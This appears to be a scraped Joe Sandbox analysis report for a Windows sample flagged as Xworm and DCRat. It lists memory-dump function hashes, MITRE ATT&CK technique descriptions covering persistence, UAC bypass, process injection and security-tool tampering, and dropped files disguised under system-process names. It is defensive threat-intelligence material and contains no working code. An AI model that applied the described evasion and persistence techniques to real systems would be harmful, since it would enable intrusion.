Opcode Fuzzy Hash: 87c61e93714f3c7b46b8e4bee5ace8174c5028c9eac37aaa4a39532a3294610f
Instruction Fuzzy Hash: 35F03C30E1A54E8EDF98EF94C8696BD76A4FF18305F11047AD41ED21A5DF75A650C700

Function 00007FFD9B821212 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2237868681.00007FFD9B811000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B811000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b811000_ServerWeb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60db344b29100aa70dc1166b7c25f2ff0656ab26a1c0b2ea6261fa598476ac62
Instruction ID: d81f6a4de07b719d06ce73de9b5cbeaf558da3d51a54601086472fa03c02e35a
Opcode Fuzzy Hash: 60db344b29100aa70dc1166b7c25f2ff0656ab26a1c0b2ea6261fa598476ac62
Instruction Fuzzy Hash: 0CF0963194E3CA9FD716DBB0C8655E57FB4EF47204B1500F6E459CB0A2C62C270AC761

Function 00007FFD9B8287CB Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2237868681.00007FFD9B811000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B811000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b811000_ServerWeb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9496d0d872007b51222fdd3fe00353a377ea278a70895a35052d21b23a13809
Instruction ID: b2f3356542d9f0772a07befb73cce6b3b5eeaf19602438aa5d75e030ea13ceec
Opcode Fuzzy Hash: f9496d0d872007b51222fdd3fe00353a377ea278a70895a35052d21b23a13809
Instruction Fuzzy Hash: 30F0A73070E64DCFEF748F5584602B93791DF49351F11057FC58A429E1CB38A6519741

Function 00007FFD9B821F21 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2237868681.00007FFD9B811000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B811000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b811000_ServerWeb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92dcda61bac1f83781bb789a792d7796391cdc250812c3143bf8241cbba82c6c
Instruction ID: 7fed0c0774cc5ea8f515300a1a962e69d0547d5fdb50c8918e4274af8b8ad12a
Opcode Fuzzy Hash: 92dcda61bac1f83781bb789a792d7796391cdc250812c3143bf8241cbba82c6c
Instruction Fuzzy Hash: 9BB09200F1E20B42E93012E0586003C00400B0D3C0B622A33E21A451E2EC5C3A001210

Function 00007FFD9B81CA73 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2237868681.00007FFD9B811000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B811000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b811000_ServerWeb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f137cdd1f83d6b22f4e54eed0239b6d93071933c80d1178526bc755bdd8209ac
Instruction ID: a7d774bb1bd8c6c292e9988b308cd037df470455b0bb8edac822ee62b35803d1
Opcode Fuzzy Hash: f137cdd1f83d6b22f4e54eed0239b6d93071933c80d1178526bc755bdd8209ac
Instruction Fuzzy Hash: 72B00250F0F60B57E53552F514AA17D00410B5D645F662635E50A5A1E2EC9C2A4156A1

Function 00007FFD9B8289FB Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2237868681.00007FFD9B811000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B811000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b811000_ServerWeb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62659c24387135428b38ee3cd4600c0098d4378c14c57e5f6289d16442259173
Instruction ID: e99f23033168474b8fdc7f4873406ee5afab7fa79c0c5a6afe2e5f8dcc16f447
Opcode Fuzzy Hash: 62659c24387135428b38ee3cd4600c0098d4378c14c57e5f6289d16442259173
Instruction Fuzzy Hash: 56C09B3050F3C6CFD7225774C4211683BE45F0734475605F5D054861F7C53D6555D751

Function 00007FFD9B822449 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2237868681.00007FFD9B811000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B811000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b811000_ServerWeb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03baad73e3ada4c10ff25f05a6d6f949f880b128b5ad919fbc3d3448884f1580
Instruction ID: d1134bf3375cf270574c019a77837bb2fa3784697823fa79b458244e62e1051b
Opcode Fuzzy Hash: 03baad73e3ada4c10ff25f05a6d6f949f880b128b5ad919fbc3d3448884f1580
Instruction Fuzzy Hash: 33A00201B0E91A42F56D27D4103587E80811F49780A511439E45E451FB8D4C2601305F

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ywXeiXEvP2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\9e8d7a4ca61bd9

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe

C:\Program Files (x86)\jDownloader\config\088424020bedd6

C:\Program Files (x86)\jDownloader\config\conhost.exe

C:\Program Files\Uninstall Information\OfficeClickToRun.exe

C:\Program Files\Uninstall Information\e6c9b481da804f

C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe

Windows Analysis Report
ywXeiXEvP2.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre